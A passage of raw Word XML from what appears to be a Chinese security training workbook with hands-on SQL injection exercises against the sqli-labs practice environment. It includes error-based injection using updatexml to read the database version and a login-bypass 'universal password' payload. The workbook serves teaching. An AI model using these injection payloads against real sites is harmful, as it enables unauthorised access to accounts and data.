              <w:instrText xml:space="preserve"> PAGEREF _Toc4267 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3341" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc18798" w:history="1">
            <w:r>
              <w:t>关闭报错信息显示</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc18798 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3342" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc8097" w:history="1">
            <w:r>
              <w:t>禁用高危函数</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc8097 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3343" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8306"/>
            </w:tabs>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc2307" w:history="1">
            <w:r>
              <w:t>降低账号权限</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:instrText xml:space="preserve"> PAGEREF _Toc2307 \h </w:instrText>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="059C3344" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
          <w:r>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="059C3345" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="059C3346" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc22042"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>手动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入练习</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="059C3347" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc18689"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单引号报错注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3349" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3348" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C334B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C334A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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单引号报错注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C334D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C334C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C334F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C334E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握通过一种简单的方法快速检测目标系统是否存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3351" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3350" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3355" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3352" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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目标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3353" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>正常访问</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Dumb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户的密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3354" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:num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通过单引号报错方式检测该链接是否存在</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>SQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入漏洞</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3357" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3356" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C335D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3358" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:num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通过</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>正常访问</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式查看</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Dumb</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户的密码</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-1/?id=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3359" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="059C3621" wp14:editId="059C3622">
                  <wp:extent cx="4552950" cy="207645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2950" cy="2076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59C335A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:num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访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-1/?id=1'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>出现报错，说明存在漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C335B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="059C3623" wp14:editId="059C3624">
                  <wp:extent cx="5010150" cy="2009775"/>
                  <wp:effectExtent l="0" t="0" r="0" b="952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0150" cy="2009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59C335C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C335E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C335F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc31363"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于报</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>错回显</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:proofErr w:type="gramEnd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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3361" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3360" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3363" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3362" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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</w:rPr>
              <w:t>基于报</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>错回显</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3365" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3364" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3367" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3366" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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学员能够掌握基于报</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>错回显方式</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3369" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3368" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C336C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C336A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:num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目标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-1/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C336B" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:num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采用报</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>错回显</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>方式，获取当前数据库版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C336E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C336D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3375" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C336F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="313CC51D" w14:textId="384302CC" w:rsidR="008A3C16" w:rsidRPr="008A3C16" w:rsidRDefault="00B14F0E" w:rsidP="008A3C16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访问</w:t>
            </w:r>
            <w:r w:rsidR="008A3C16" w:rsidRPr="008A3C16">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="008A3C16" w:rsidRPr="008A3C16">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>sqli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="008A3C16" w:rsidRPr="008A3C16">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve">-labs/Less-1/?id=1' union select </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="008A3C16" w:rsidRPr="008A3C16">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>1,updatexml</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="008A3C16" w:rsidRPr="008A3C16">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>(1,concat(0x7e,</w:t>
            </w:r>
            <w:r w:rsidR="008A3C16">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>version</w:t>
            </w:r>
            <w:r w:rsidR="008A3C16" w:rsidRPr="008A3C16">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>()),1) -- 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3370" w14:textId="0362B285" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3371" w14:textId="5AE65A23" w:rsidR="002D44C5" w:rsidRDefault="006201D1">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr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521CDE56" wp14:editId="4044A5E7">
                  <wp:extent cx="3215310" cy="1894114"/>
                  <wp:effectExtent l="0" t="0" r="444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0528" cy="18971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9C3372" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3373" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="5"/>
              </w:numPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C3374" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C3376" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3377" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc4039"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“万能密码”登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3379" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3378" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C337B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C337A" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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</w:rPr>
              <w:t>“万能密码”登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C337D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C337C" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C337F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C337E" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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lastRenderedPageBreak/>
              <w:t>学员能够掌握在不知道密码的情况下，利用“万能密码”登录到目标系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3381" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3380" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3385" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3382" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:num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目标链接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>http://ip/sqli-labs/Less-11/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3383" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:num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使用随机一个密码登录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户，登录失败</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3384" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:num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使用“万能密码”登录</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>admin</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>用户，登录成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3387" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3386" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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实操过程记录及截图（需要记录漏洞利用参数、操作命令）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C338E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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24F55BC7" w14:textId="77777777" w:rsidR="00716AFC" w:rsidRPr="00716AFC" w:rsidRDefault="00AA3FA2" w:rsidP="00716AFC">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="58"/>
              </w:num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万能密码为</w:t>
            </w:r>
            <w:r w:rsidR="00716AFC" w:rsidRPr="00716AFC">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>passwd=1' or username='admin' -- 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="059C3388" w14:textId="73CEA720" w:rsidR="002D44C5" w:rsidRDefault="002D44C5" w:rsidP="00AA3FA2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="059C338A" w14:textId="3902A4D6" w:rsidR="002D44C5" w:rsidRDefault="006261D8" w:rsidP="006261D8">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia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62AFAA22" wp14:editId="0B6640F3">
                  <wp:extent cx="3936433" cy="4065815"/>
                  <wp:effectExtent l="0" t="0" r="698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8386" cy="40884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9C338D" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="059C338F" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="002D44C5"/>
    <w:p w14:paraId="059C3390" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc14671"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基于布尔的盲注</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4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8522"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3392" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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14:paraId="059C3391" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr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实操题目</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D44C5" w14:paraId="059C3394" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="85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059C3393" w14:textId="77777777" w:rsidR="002D44C5" w:rsidRDefault="00000000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基于布尔</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
